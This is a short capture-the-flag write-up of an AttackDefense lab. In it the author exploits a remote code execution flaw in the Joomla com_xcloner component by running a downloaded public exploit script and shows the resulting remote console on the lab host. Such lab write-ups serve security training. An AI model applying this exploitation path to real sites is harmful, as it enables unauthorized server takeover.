
AttackDefense.com [RCE] - Joomla com_xcloner Component

Image of AttackDefense 2018

Mission

A version of Joomla com_xcloner Component is vulnerable to remote code execution attack. Your task is to find and exploit this vulnerability.

The following username and password may be used to explore the application and create regular users if required to exploit authenticated access vulnerabilities:

  • User: admin
  • Password: password

Level difficulty: Easy

Category: Real World Webapps > Remote Code Execution

Solution

First I was provided with the following Joomla website:

Image of AttackDefense 2018

Using the username and password given at the start of the challenge, I logged in to the Joomla Control Panel:

Image of AttackDefense 2018

There I was able to discover the installed version of Joomla Core:

Image of AttackDefense 2018

Even though I tried several known remote code execution exploits for Joomla Core 1.6.0, I could not get command execution on the target website. I therefore went back to the hint provided in the mission:

Joomla com_xcloner Component

This simple statement prompted me to search Google for exploits applicable to the Joomla com_xcloner component and, to my surprise, I found the following:

Image of AttackDefense 2018

After downloading the exploit and running it against the target website, I obtained the following:

lucian@local:~/Downloads$ python 16246.py -t ie9i8y5pobnhaf1u7vhg8egbt.public2.attackdefenselabs.com:80 -d /joomla/

	| ----------------------------------------------------------------------------- |
	| Joomla component (com_xcloner-backupandrestore) remote code execution explo!t |
	| by mr_me - net-ninja.net ---------------------------------------------------- |

(+) Targeting http://ie9i8y5pobnhaf1u7vhg8egbt.public2.attackdefenselabs.com:80/joomla/
(!) Exploit working!
(+) Droping to remote console (q for quit)

lucian@ie9i8y5pobnhaf1u7vhg8egbt.public2.attackdefenselabs.com:80# 

The last thing to do was to prove that I had finished the challenge:

Image of AttackDefense 2018

Image of AttackDefense 2018

This post is licensed under CC BY 4.0 by the author.